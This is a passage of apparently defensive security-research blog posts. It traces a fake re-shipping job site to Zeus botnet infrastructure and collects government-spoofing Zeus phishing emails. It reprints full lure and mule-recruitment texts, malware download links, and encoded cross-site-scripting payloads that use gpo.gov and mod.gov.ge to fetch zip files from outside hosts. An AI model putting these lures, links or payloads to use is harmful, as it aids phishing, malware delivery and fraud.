When using stolen credit card numbers to make purchases online, criminals do not provide their own identity or location information. Instead, criminals post advertisements on job search Web sites in order to lure “pack mules” to act as intermediaries in their criminal operations. These intermediaries receive merchandise on the criminal’s behalf and re-ship it to a location under the control of the criminals. This operation is known as “re-shipping fraud” and is similar to the ways in which some criminals recruit “money mules” to open bank accounts for transferring stolen funds.

Re-shipping is tightly intertwined with malware activity. This is demonstrated by the fact that the Web sites used to recruit pack mules are hosted on the same servers that host the command-and-control servers of Zeus botnets. I have been exploring (see Clustering Zeus Command and Control Servers Part 1 and Part 2) clusters of Zeus activity in an attempt to better understand the connections among the criminals behind different functions within the botnet ecosystem. I have found that although Zeus is a popular malware toolkit that any aspiring criminal can use to setup a botnet capable of stealing credit card and banking information, there is a cluster of malicious Zeus servers which indicate that there is a “core” of Zeus operations.

In this blog post, I analyze the pack mule recruiting Web site, “Sullivan and Myers,” (sullivanmyers.com) and explore its links with Zeus botnets and the broader malware underground. This investigation indicates that these concentrations of malicious activities go beyond operating command-and-control servers and extracting banking information to other aspects of the criminal enterprise. This includes exploitation (through “exploit packs“) and the recruiting of pack and money mules.

Pack Mule Recruitment

In order to recruit pack mules, criminals setup Web sites that purport to belong to a legitimate shipping and receiving business, and post advertisements that link to the “business” on job search Web sites and forums. This can be seen in the case of Sullivan and Myers, a fake business created for the purpose of recruiting pack mules.

Sullivan and Myer’s job posting invites interested applicants to complete an online application form and submit a resume to hr@sullivanmyers.com. Sullivan and Myer’s contact information (address, phone, and fax number) is also supplied. The application form, contact information, and the company’s Web site appear to have been designed to create a sense of legitimacy. Although there are some indicators that suggest the company may be fake, such as awkward language and occasional errors (using “Myers & Sullivan” instead of “Sullivan and Myers”), the overall presentation is passable. To some applicants, the company may appear to be legitimate.

After submitting a resume, applicants are given additional information about the position. The applicants are informed that they will be receiving packages which they are to re-package and send to the company’s “consumers.” The applicants are told that they can earn up to USD3000 per month.

Human Resource hr@sullivanmyers.com

Your documents has been verified and checked; you seem to be a suitable
candidate for Junior Packing Specialists’ position and we are glad, that you are
interested in this opening.

Following, you’ll find information about Sullivan & Myers and additional details
about Junior Packing Specialist position.

Sullivan & Myers (NASDAQ: SUM) is a well known printing and typography company
that offers wide variety of printing, publishing and general advertising
services. Company is based in US with headquarters in GA, Atlanta. If you want
to find out more about Sullivan & Myers, please visit our web site
www.sullivanmyers.com

This is a part-time job with a flexible schedule. Work time is not
limited, but to be successful you need to devote at least 10hrs per week to it,
though those who work up to 20hr/week have best results in the company.

This is a part-time job and it can be rendered at home, thus all but few

communications will be handled online, because of this job requirements include
acceptable level of computer literacy and Internet access. There is no entrance
or any other hidden fee. The company covers all the fees related to this
employment.

Junior packing specialist’s job is quite simple, currently Sullivan & Myers
provide a complex package of services for a network of a well-known consumer’s
electronics company, you will be receiving scheduled packages from them. The
parcels mostly consist of electronics and consumer goods with no oversized
deliveries. You shall receive a specialized packing paper from Sullivan & Myers
or its affiliates, part of it will be a decal paper, picturing different
advertisements from our client’s partner, some might only be protective wrapping
to provide additional security to fragile goods. Junior Packing specialist’s job
is simple, you need to repack each package & parcel and make sure that
consistence of package is fully operational or/and lacking visual defects and
forward it to consumers via USPS or FED EX. You might receive up to 10 packages
per week (during your trial period) thus as we already mentioned we require at
least 10hrs to be dedicated to this job.

To the successful applicants we offer a position on a trial period (30
business days, from the first actual assignment). This is the period when you
will be trained and shall receive 24/7 online and phone support, while earning
money. The evaluation of employees on a trial period is usually at least one
week before the end of their trial period. During the trial period, the
supervisor can recommend termination. At the end of the trial period, supervisor
makes his decision.

The trial period is paid $1390 USD per month. For every successful mail/parcel
forwarded you will receive $35, also you shall receive an additional bonus of
$15 per parcel that you send at the day of delivery, for example, if you have
received a parcel at 01.05.2010 and forwarded it at the same day, you shall
receive not $35 but $50 commission. Your total income, with the current volume
of clients, will be added up to $3000 USD per month. Your base salary, after
trial period, will go up to $1900 per month, plus $45 per parcel you forward.

You may ask for additional hours after trial period, or proceed full-time.
If you are interested in this job, please reply to this e-mail and our HR
managers will send you all required paperwork.

Next, applicants are sent a contract and are then instructed to send copies of identification and proof of residency for a background check to minimize fraud. This is an important step because if, at a later point, the applicant determines that the company is not legitimate and wants to quit, the criminals behind this operation could attempt identity theft or otherwise compromise the individual.

Human Resource hr@sullivanmyers.com:

In this e-mail, you will find attached legal document specifically a labor
contract for Junior Packing Specialist position in Sullivan & Myers.

Make sure you read it carefully, familiarize yourself with all aspects of
the agreement and in case if you agree with the terms do the following:

1. Print out two (2) copies of the labor contract.
2. Sign both parts, you must sign it on the bottom of EVERY page,
plus at the end of the document.
3. Forward one part to Sullivan & Myers HR department at
hr@sullivanmyers.com or fax it to 1-(678)-866-2530
4. Keep one signed copy for yourself.

The contract becomes valid from the moment of the reception of the
correctly filled copy of the contract. It should be noted that the validity
of the contract in the electronic form is identical to the contract signed
in personal presence of both parties.

In order to minimize fraudulent activities we have implemented strong
security policy, we are running mandatory background checks for every
successful candidate. Background check includes but is not limited to,
criminal, financial or personal records that are available publicly. In VERY
rare cases, Sullivan & Myers may enforce PI. As a part of our security
policy we ask you to make an electronic copy of your ID, driving license or
any other legal document that may verify your identity (any utility bill
will do, if your domicile is mentioned there) and send it attached with the
same e-mail or fax it to 1-(678)-866-2530.

You will receive additional information when your forwarded contract will
be examined and verified by our attorneys.

*NOTE: Requires manual signature.

After receiving the signed contract, the criminals confirm the mailing address of the new “employee.” At this point, the new employee will begin receiving packages of goods bought with stolen credit card information and forwarding these goods to the criminals behind the operation. When law enforcement tracks down the operation, they will be led to the address of the pack mule rather than the masterminds behind the operation.

The Malware Connection

Locating Sullivan and Myers within the malware ecosystem exposes the criminal connections of those behind the re-shipping fraud operation. The Web site sullivanmyers.com is registered to the e-mail address migray71@yahoo.com and resolves to the IP address 194.28.112.11. Migray71@yahoo.com is linked to significant malicious activity.

The hosting history of sullivanmyers.com firmly places the domain within concentrations of malicious activity. Currently, the Web site is hosted on a server with the IP address 194.28.112.11. This server also hosts azkinternational.com (azkint@bronzemail.net), fotosharedownloads.com (hosting@haiau.tv) and fotoshare-dknc.com (markson@bluewin.ch). Fotosharedownloads.com and fotoshare-dknc.com are Web sites that host malware, and azkinternational.com appears to be another pack mule recruiting Web site.

Sullivanmyers.com has been hosted on a number of servers that have hosted significant amounts of malicious activity in the last year. Currently, these servers are hosting domain names registered to known malicious e-mail addresses.

2010-11-06 223.25.242.61

- binmop.com – migray71@yahoo.com
- glazsystem.net – annepark@gmail.com
- nonameal.com – descartez@hotmail.com
- unknownplaces.net – mcthomas34@first-host.net

2010-09-24 27.131.32.153

- antiviruslab.info – mcthomas34@first-host.net
- bransac.com – descartez@hotmail.com
- myweb-analytics.net – migray71@yahoo.com
- organte.com – ddgrimes@earthlink.net

2010-09-13 113.11.194.158

- trackingcounter.net – trackingcounter.net@protecteddomainservices.com

2010-07-03 113.11.194.148

- baidum.net – edgar.marcha@verizon.net
- hpnet.in – socks5service@list.ru
- kiaz.org – analizsite@gmail.com
- kingolat.com – ddgrimes@earthlink.net
- mainspain.info – edgar.marcha@verizon.net
- maturesdf.com – MillieDiaz4@aol.com
- southdomens.com – southdomens@googlemail.com
- tarstall.ru – boats@qx8.ru
- topmilkyway.net – ddgrimes@earthlink.net
- truetry.org – analizsite@gmail.com
- vuvuzelya.net – edgar.marcha@verizon.net

The domain names listed above resolve to IP addresses of servers that were previously used to host sullivanmyers.com. While some of the domain names have already been linked to malicious activity, some have not. However, they are associated with e-mail addresses that have been used to register malicious domain names in the past.

Using data from MalwareDomainList and ZeusTracker, we can see the extent to which domain names registered by migray71@yahoo.com are engaged in malicious behavior and linked through co-hosting to other malicious domain names. These malicious domain names have been active throughout 2010 and have been used to host exploit packs, such as Pheonix and Eleonore; downloaders, such as Oficla/Sasfis, Fake Antivirus, the RussKill DDoS tool and multiple versions of the Zeus Trojan; and associated drop zones and command-and-control servers. This e-mail address was also used to register sosanni.com, a command-and-control server for the Ambler botnet.

The most interesting connection within this cluster links the activity of domain names registered with migray71@yahoo.com to the Ambler botnet and to a cluster of malicious Zeus activity. The domain name sosanni.com (migray71@yahoo.com – 121.101.216.205) was an Ambler command-and-control server that was operated by the same set of actors that administered a cluster of Zeus command-and-control servers registered with a variety of well- known e-mail addresses, including hilarykneber@yahoo.com, edgar.marcha@verizon.net, and MillieDiaz4@aol.com.

The hilarykneber@yahoo.com e-mail address was made infamous after Netwitness revealed the existence of a Zeus-based botnet associated with that email address that had compromised over 74,000 computers around the world. An association with the Kneber botnet indicates that those behind the operation have no shortage of stolen credit card numbers that could be used to make purchases that are re-shipped through the pack mule operation. Moreover, this cluster was found to be not only operating a Zeus botnet, but a SpyEye and the Ambler botnet as well. This indicates that the criminals are diversifying their operations using multiple forms of malware that are designed to steal credit card numbers, bank account information, and other credentials.

However, there are some limitations to this analysis. Just because domain names are hosted on the same server, it does not mean that there is necessarily a direct connection between them. There are a variety of “bullet proof” Web hosting companies that provide stable hosting to a wide variety of malicious activity. Online criminal prefer these services because the “bullet proof” hosts ensure that malicious Web sites remain online despite efforts of the security community to take them down.

Domain names registered with the same e-mail address provides a stronger link because this indicates that the domain names are under the control of one entity. However, domain names registered to the same e-mail address may not be directly linked. There are a variety of services available within the malware underground that include domain registration. For example, the domain name southdomens.com (southdomens@googlemail.com) is hosted on a server that sullivanmyers.com was formerly hosted on. The server is also associated with a service that provides domain name registration. If domain registration services register domain names for multiple clients with the same e-mail address, it provides a weak (rather than strong) link between malicious activity clustered around domain names registered with the same e-mail address. Domain names registered with the same e-mail address may be distributed by the supplier to an array of disparate criminals. So, rather than indicating a strong connection between the malicious actors using the domain names, it simply shows that disparate malicious actors sought the services of the same domain name provider.

Keeping these limitations in mind, I believe that while there are specialized roles within the malware ecosystem, there appears to be a significant portion that is quite centralized. In this case, domain names registered with the same e-mail addresses not only inhabit servers full of malicious activity, but are also associated with “pack mule” recruitment, exploit packs, and Zeus and Ambler command-and-control servers. While the exact nature of the connections between them are unclear, these concentrations indicate that a discrete set of criminals are behind an operation that goes full circle—from exploiting victims, to harvesting credentials to acquire goods which are relayed through a network of pack mules back to the criminals.

This post is an overview of a collection of publicly available emails associated with these ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers’ malicious code. While the attacks are not targeted down to the individual, or even institutional level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues.

The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr’s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues with some messages making use of classification markings such as “U//FOUO” and official looking email footers in order to appear to be legitimate.

The links in to the malicious files contained within the emails make use of a variety of hosts. The attackers will often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. The attackers also use compromised legitimate websites, many of which are running the Joomla! CMS. However, at other times the attackers have used domain names registered specifically for malicious purposes:

dnicenter.com – abuseemaildhcp@gmail.com
dhsorg.org – hilarykneber@yahoo.com

The email addresses abuseemaildhcp@gmail.com and hilarykneber@yahoo.com are well known and have been used to register numerous domain names associated with malware, mostly ZeuS.

The “hilarykneber@yahoo.com” email address was made famous by discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising as any large botnet is likely to have compromised some government computers. But, the recognition of this fact may be the catalyst for the series of attacks using intelligence, military and security themes as lure. Not all compromised computers are of the same value, surely the attackers realize this. In “Conversations With a Blackhat” RSnake outlines this scenario:

There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

A variation of this is a scenario in which the botmaster grows the botnet but through means that increase the chances of compromising a target of interest that “badguy1″ wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting in with the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that’s been stolen or sell access to any sensitive compromised computer.

The emails below are a collection of publicly available emails associated with a series of ongoing of attacks using Zeus.

December 9, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html

From: ecu@nsa.gov
Date: December 9, 2009 4:33:51 PM GMT+05:00
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS

AFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009

CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)

INFORMATION SUBJECT TO EXPORT CONTROL LAWS

WARNING – This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.

DESTRUCTION NOTICE – For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.

Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.

Download:

http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip

or

http://rapidshare.com/files/318309046/CYBERCAFE.zip.html

http://www.sendspace.com/file/fmbt01

December 14, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&viscount=14&expand=1

From: uctd@nsa.gov
Date: December 14, 2009 1:56:24 PM GMT+05:00
Subject: Information Systems Security Reminder

Information Systems Security Reminder

– Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.

– Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including “shoulder surfing” by nearby persons.

– When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.

– If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.

Security Software:

http://hkcaregroup.com/modlogan/MILSOFT.zip

or

http://rapidshare.com/files/320369638/MILSOFT.zip.html

http://fcpra.org/downloads/MILSOFT.zip

February 10, 2010
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/

From: jeffreyc@greylogic.us
Date: Wednesday, February 10, 2010 7:34 AM
Subject: Russian spear phishing attack against .mil and .gov employees

Russian spear phishing attack against .mil and .gov employees

A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://fcpra.org/downloads/winupdate.zip

or

http://www.sendspace.com/file/tj373l

___________
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us

February 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg12517.html

From: jeffreyc@nsa.gov
Date: February 11, 2010 9:39:15 AM GMT+05:00
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .mil

Zeus Attack Spoofs NSA, Targets .gov and .mil

Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.

According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.

The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/7jmxtq

February 12, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security

From: apacs@pentagon.af.mil
Date: 12 Feb 2010 20:41:01 (GMT)
Subject: DoD Roles and Missions in Homeland Security

Defense Science Board

DoD Roles and Missions in Homeland Security

VOLUME II – A: SUPPORTING REPORTS

This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.

Download:

http://mv.net.md/dsb/DSB.zip

or

http://www.sendspace.com/file/rdxgzd

___________
Office of the Under Secretary of Defense
For Acquisition, Technology, and Logistics
Washington, D.C. 20301-3140

February 21, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg25834.html

From: cttd@fbi.gov
Date: February 21, 2010 7:37:16 AM GMT+05:00
Subject: INTELLIGENCE BULLETIN

FEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN

February 2010

Weapons of Mass Destruction Directorate

Indicators for Terrorist Use of Toxic Industrial Chemicals

THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.

UNCLASSIFIED//FOR OFFICIAL USE ONLY

Download:

http://timingsolution.com/Doc/BULLETIN.zip

or

http://www.sendspace.com/file/goz3yd

___________
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.

March 6, 2010
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam

Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e

________________
Office of the Director of National Intelligence Washington, D.C. 20511

* The actual URL is: http://dnicenter.com/docs/report.zip

March 7, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only—dprk-missile-attack-on-japan
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email

From: SSC@dia.mil
Date: 7 Mar 2010 14:17:51 (GMT)
Subject: FOR OFFICIAL USE ONLY

Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22

________________
Office of the Director of National Intelligence
Washington, D.C. 20511

* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip

March 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html

From: hsi@dhs.gov
Date: March 11, 2010 11:38:56 PM GMT+05:00
Subject: U.S. Department of Homeland Security

Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

11 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://dhsorg.org/docs/instructions.zip

________________
U.S. Department of Homeland Security
Washington, DC 20528

March 13, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified

From: NSI@dhs.gov
Date: 13 Mar 2010 18:26:54 (GMT)
Subject: RE: Instructions UNCLASSIFIED

U.S. Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

13 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
______________________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
______________________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://www.sendspace.com/file/h96uh1

or

http://depositfiles.com/files/xj1wvamc4

________________________________________
U.S. Department of Homeland Security
Washington, DC 20528

June 16, 2010
Source: http://www.clearancejobs.com/security_tips.php

From: rss@stratcom.mil
Date: Wed Jun 16 13:10:08 2010
Subject: From STRATCOM to

,

United States Strategic Command

Commanders Reading List

Professional development is essential to the successful execution of our mission – to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander’s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.

All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.

Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.

KEVIN P. CHILTON
General, USAF
Commander

Inside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)

This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)

Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec’s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.

Additional information can be found in the following report:

http://tiesiog.puikiai.lt/report.zip

http://somashop.lv/report.zip

________________________________________
To report a problem please submit an ODNI/ICES Ticket
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)”

June 17, 2010
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html

From: izhar.mujaddid@pentagon.af.mil
Date: Thursday, June 17, 2010 – 11:57 am
Subject: Scientific Advisory Board

UNCLASSIFIED//FOR OFFICIAL USE ONLY

United States Air Force

Scientific Advisory Board

Report on Defending and Operating in a Contested Cyber Domain

Executive Summary and Annotated Brief
SAB-TR-10-01
June 2010

This report is a product of the United States Air Force Scientific Advisory
Board Study Committee on Defending and Operating in a Contested Cyber
Domain. Statements, opinions, findings, recommendations and conclusions
contained in this report are those of the Study Committee and do not
necessarily represent the official position of the United States Air Force or the United States Department of Defense.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
HQ USAF/SB
1180 AF PENTAGON RM 5D982
WASHINGTON, DC 20330-1180

June 17, 2010
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936

From: tsa@dhs.gov
Date: 2010-06-17 18:01:16 GMT
Subject: (U) Transportation Security Administration

UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U) Transportation Security Administration

(U) Terrorist Attack Methods in Airport Terminals

A Predictive Analysis for the Detection-Technology Community

15 June 2010

(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)
assessment, developed at the request of the TSA Office of Security Technology,
examines the terrorist tactics used to attack passengers inside the public areas of an
airport terminal in order to assist in developing security procedures and deploying threat
